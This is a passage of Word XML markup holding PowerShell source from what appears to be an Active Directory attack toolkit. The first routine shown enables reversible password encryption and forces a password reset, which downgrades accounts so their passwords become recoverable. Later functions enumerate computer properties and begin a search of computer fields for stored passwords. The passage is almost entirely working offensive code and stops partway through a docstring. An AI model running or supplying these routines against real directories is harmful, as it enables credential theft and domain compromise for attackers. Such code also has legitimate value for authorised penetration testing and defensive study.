    </w:p>
    <w:p w14:paraId="23E0C45C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Filter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9C80E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3DDC7144" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF20FAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Repair,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D503A35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="09D605B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5AD5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F8ED54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B584DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EB6C17E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3429C2E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Arguments = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41263636" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'SamAccountName' = $SamAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA94D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Name' = $Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352D43DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Domain' = $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24915904" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'DomainController' = $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710BF39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Filter' = $Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5884E691" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Credential' = $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E2210" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BDB466" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18BE9F2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # splat the appropriate arguments to Get-ADObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ED26F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UACValues = Get-ADObject @Arguments | select useraccountcontrol | ConvertFrom-UACValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC8C41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="429D47C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Repair) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D72636" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26E1B0B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($UACValues.Keys -contains "ENCRYPTED_TEXT_PWD_ALLOWED") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4476A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if reversible encryption is set, unset it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88C447" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DEA8F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03F487" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44C8A3C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # unset the forced password change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603EEC3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F9EB26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF0ED5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7AA8EF25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB629E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A330AC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($UACValues.Keys -contains "DONT_EXPIRE_PASSWORD") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633099A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if the password is set to never expire, unset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A829791" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 65536</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFD8CF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401599CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17BA1E8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($UACValues.Keys -notcontains "ENCRYPTED_TEXT_PWD_ALLOWED") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32A8DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if reversible encryption is not set, set it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6485157A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6095D870" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9D28D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B348603" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # force the password to be changed on next login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29060D10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682FEEE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ED4128" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E94D35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7243D480" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2F3C2212" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="30F3D1D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-ComputerProperty {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C64C59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166BB5FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D31ABF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="359DE7C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns a list of all computer object properties. If a property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D1DC72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        name is specified, it returns all [computer:property] values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F02AD65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04C2ED70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Taken directly from @obscuresec's post:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451B8AD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA98FC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1FFD97F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBAB970" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C68E311" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return property names for computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDBD3CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72592408" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C82876" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79C523E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for computer properties, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFEA052" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35593026" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3998EAC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A73F7B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF2E107" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39AF9033" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3BD962" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="560F4ACF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B5C89C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0FDDC13F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494B46AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67E37546" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C16E622" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358768D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26CCD1D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A5276" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D5A454C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-ComputerProperty -Domain testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B213292" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439E138F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all user properties for computers in the 'testing' domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22612CFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0507D02A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C97E1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27F770AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-ComputerProperty -Properties ssn,lastlogon,location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAA96C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D665842" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all an array of computer/ssn/lastlogin/location combinations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A54B644" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for computers in the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE123D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E281650" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ECF1E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3708E1B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC714AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270EE5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71754491" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD46656" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0166CE3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600270DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Properties,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B0E0C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14ABCEFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E30AF8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBA6CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3BCA62CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3D675B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B2E4D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E015988" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D47904" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46337AA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF5173C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="388925F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00829EBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E10BE55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53629E84" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="096818EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($Properties) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79909AD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # extract out the set of all properties for each object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B909E58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Properties = ,"name" + $Properties | Sort-Object -Unique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36175C07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -PageSize $PageSize | Select-Object -Property $Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39324C04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599AF644" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E66D1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # extract out just the property names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF4C648" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -PageSize $PageSize | Select-Object -first 1 | Get-Member -MemberType *Property | Select-Object -Property "Name"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B677C58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C19FAB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB2E6B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0948C2FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="476CF73E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Find-ComputerField {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A55DA1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9D8D83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594AA18C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F24523A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Searches computer object fields for a given word (default *pass*). Default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7330CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        field being searched is 'description'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1123BEA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
